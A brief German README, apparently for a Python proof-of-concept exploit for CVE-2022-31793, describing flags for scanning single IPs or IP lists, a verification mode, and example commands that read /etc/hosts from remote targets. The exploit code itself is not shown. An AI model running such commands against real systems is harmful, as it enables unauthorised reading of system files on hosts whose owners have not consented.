
Proof-of-Concept-Exploit für CVE-2022-31793 mit IP-/dateibasiertem Zielscan, Validierungsmodus und beliebigem Dateilesen über HTTP-Anfragen.
-u gibt IP an -l gibt IP-Datei an -v Überprüfungsmodus -f gibt die zu lesende Datei an
python poc.py -u ip -v
python poc.py -l url.txt -v
python poc.py -u ip -f /etc/hosts
python poc.py -l url.txt -f /etc/hosts